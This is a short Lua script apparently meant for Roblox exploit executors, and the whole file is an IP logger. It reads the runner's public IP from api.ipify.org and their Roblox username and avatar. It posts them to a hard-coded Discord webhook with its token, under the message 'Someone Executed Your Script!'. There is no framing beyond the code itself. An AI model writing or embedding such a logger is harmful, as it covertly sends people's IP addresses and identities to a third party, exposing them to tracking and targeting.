local IP = game:HttpGet("https://api.ipify.org")
local url = "https://discord.com/api/webhooks/893494104967745536/VHewGl-cOp0Ge-BU2DtuQCH5xTNz5sWi5u9ZlHgjdR8FabK-eSjeJtnGy-o07CxVpqaw"
local data = {
   ["content"] = "**Someone Executed Your Script!**",
   ["embeds"] = {
       {
           ["title"] = "IP: " .. IP,
           ["description"] = "Username: " .. game.Players.LocalPlayer.Name,
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
